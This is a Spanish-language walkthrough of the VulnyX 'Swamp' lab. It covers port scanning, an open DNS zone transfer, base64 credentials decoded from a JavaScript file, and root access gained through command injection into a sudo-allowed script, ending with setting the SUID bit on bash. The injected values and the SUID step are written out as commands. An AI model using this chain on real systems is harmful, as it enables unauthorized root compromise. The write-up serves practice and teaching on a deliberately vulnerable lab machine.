cd ~/blog

~/writeups/vulnyx/09-swamp.md

09 - Swamp

easy Linux vulnyx 11-02-2025
DNS Zone Transfer (AXFR)Credentials in base64 (JS)sudo custom script command injection
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.45
 nmap -sCV -p 22,53,80 -oN 02-targeted.txt 192.168.1.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 21:26 -03
Nmap scan report for 192.168.1.45
Host is up (0.00052s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
53/tcp open  domain  ISC BIND 9.18.28-1~deb12u2 (Debian Linux)
| dns-nsid:
|_  bind.version: 9.18.28-1~deb12u2-Debian
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Did not follow redirect to http://swamp.nyx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds

Agregamos swamp.nyx al /etc/hosts y, dado el servicio DNS (BIND), probamos una transferencia de zona con dig, que está abierta y nos revela varios subdominios:

 dig axfr swamp.nyx @192.168.1.45
...
d0nkey.swamp.nyx.	604800	IN	A	0.0.0.0
dr4gon.swamp.nyx.	604800	IN	A	0.0.0.0
duloc.swamp.nyx.	604800	IN	A	0.0.0.0
f1ona.swamp.nyx.	604800	IN	A	0.0.0.0
farfaraway.swamp.nyx.	604800	IN	A	0.0.0.0
shr3k.swamp.nyx.	604800	IN	A	0.0.0.0
...

Revisando los subdominios, en el código de farfaraway.swamp.nyx hay un archivo JS con una cadena en base64 que decodifica a unas credenciales:

 echo 'c2hyZWs6cHV0b3Blc2FvZWxhc25v' | base64 -d
shrek:putopesaoelasno

Nos logueamos por SSH y obtenemos la primera flag:

 ssh shrek@192.168.1.45
shrek@192.168.1.45's password: putopesaoelasno
Linux swamp 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 11 17:04:34 2025 from 192.168.1.7
shrek@swamp:~$

Para escalar privilegios, revisamos los permisos sudo:

shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User shrek may run the following commands on swamp:
    (ALL) NOPASSWD: /home/shrek/header_checker

Podemos ejecutar el script header_checker como root. Recibe una URL como argumento, así que probamos inyección de comandos añadiendo ; y un comando:

shrek@swamp:~$ sudo -u root /home/shrek/header_checker --url ";id"
...
uid=0(root) gid=0(root) groups=0(root)
...

Aprovechamos la inyección para asignar el bit SUID a Bash y lanzar una shell de root:

shrek@swamp:~$ sudo -u root /home/shrek/header_checker --url ";chmod u+s /bin/bash"
shrek@swamp:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1265648 Mar 29  2024 /bin/bash

shrek@swamp:~$ bash -p
bash-5.2# whoami
root

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados